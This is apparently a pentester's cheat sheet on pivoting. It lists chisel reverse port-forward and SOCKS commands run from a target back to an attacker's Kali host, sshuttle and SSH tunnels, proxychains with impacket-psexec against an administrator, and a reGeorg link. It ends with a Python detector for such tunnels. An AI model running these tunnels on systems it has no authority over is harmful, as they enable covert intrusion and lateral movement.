# Port Forwarding - Tunneling

## Chisel

* <https://github.com/jpillora/chisel/releases>

Port forwarding,

Forwarding remote port 8080 to localhost

On kali,

```
./chisel server --reverse --port 9001
```

On target,

```
.\chisel.exe client <kali-ip>:9001 R:<local-port>:127.0.0.1:<target-port>

# example
.\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080
```

SOCKS5 proxy with chisel,

On kali,

```
./chisel server -p 9001 --socks5 --reverse
```

On target,

```
chisel client <kali-ip>:9001 R:5000:socks
```

In `R:5000:socks`:

* the `R` means that we want to perform a reverse port forward;
* `5000` will be the port on the attacker machine that will act as the entry point to our SOCKS5 proxy; and
* `socks` simply means we are using the SOCKS protocol.

Add `socks5 127.0.0.1 5000` to `/etc/proxychains.conf`

* Don't forget to disable DNS resolution over proxychains.

UDP port forward,

```
# on kali
/opt/chisel/chisel_1.7.7_linux_386 server --reverse --port 9001

# on target
./chisel_1.7.7_linux_386 client 192.168.119.203:9001 R:10.1.1.89:1978/udp
```

## Sshuttle

This is the best tunneling tool

* <https://github.com/sshuttle/sshuttle>

Standalone (compiled and ready to be executed) binaries,

* <https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.5>
* <https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.0>

```
sshuttle -vvv -e 'ssh -i id_rsa' -r morph3@10.11.1.252 -x 10.11.1.252 10.2.2.1/24
```

```
sudo ./sshuttle -e "ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -c 3des-cbc" -r morph3@10.11.1.252:22000 10.2.2.1/24
```

## SSH

Port forwarding,

Forwards remote host 10.10.10.99:2049 back to localhost:2049

```
ssh -L 127.0.0.1:1978:10.10.10.99:1978 morph3@1.3.3.7
```

Tunneling,

```
ssh morph3@1.3.3.7 -p22000 -D 127.0.0.1:1080
```

```
proxychains firefox
proxychains impacket-psexec administrator@10.13.37.1
```
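
A detection-side view of the chisel remotes and SSH forwards above, as an added example that is not part of the original page: it decodes the reverse-remote argument and flags `ssh -L`/`-D` in process command lines. The function names, the sample lines and the 192.0.2.10 / 198.51.100.7 addresses are constructed for illustration.

```python
import re
import shlex

# Matches the reverse-remote shapes used on this page: R:<port>:<host>:<port>,
# R:<port>:socks and R:<host>:<port>/udp. Keyed on the argument, not the
# binary name, since the client binary can be renamed.
REMOTE_RE = re.compile(r"^R:(?:[\w.\-]+:)*(?:\d{1,5}|socks)(?:/(?:tcp|udp))?$")

def parse_remote(spec):
    """Decode a reverse remote into listener port, target and protocol."""
    body, _, proto = spec[2:].partition("/")
    parts = body.split(":")
    socks = parts[-1] == "socks"
    ports = [p for p in parts if p.isdigit()]
    hosts = [p for p in parts if not p.isdigit() and p != "socks"]
    host = hosts[-1] if hosts else "?"  # "?" = left to the tool's default
    return {
        # First port is the listener opened on the server side; with a single
        # port (the UDP form) listener and target share it.
        "listen_port": int(ports[0]) if ports else None,
        "target": "socks" if socks else f"{host}:{ports[-1]}",
        "proto": proto or "tcp",
    }

def find_tunnels(cmdline):
    """Return (kind, detail) findings for one process command line."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps '\' in paths
    findings = []
    for i, arg in enumerate(argv):
        if REMOTE_RE.match(arg):
            findings.append(("chisel-reverse", parse_remote(arg)))
        elif arg in ("-L", "-D") and argv[0].endswith("ssh") and i + 1 < len(argv):
            findings.append(("ssh" + arg, argv[i + 1]))
    return findings

# Constructed command lines modelled on the page's commands (not real logs).
SAMPLE = [
    r".\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080",
    "svc.exe client 192.0.2.10:9001 R:5000:socks",  # renamed client binary
    "./c client 192.0.2.10:9001 R:10.1.1.89:1978/udp",
    "ssh morph3@1.3.3.7 -p22000 -D 127.0.0.1:1080",
    "ssh -i id_rsa backup@198.51.100.7 uptime",  # no forwarding: no finding
]

if __name__ == "__main__":
    for line in SAMPLE:
        for kind, detail in find_tunnels(line):
            print(kind, detail, "<-", line)
```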

## reGeorg

* <https://github.com/sensepost/reGeorg>
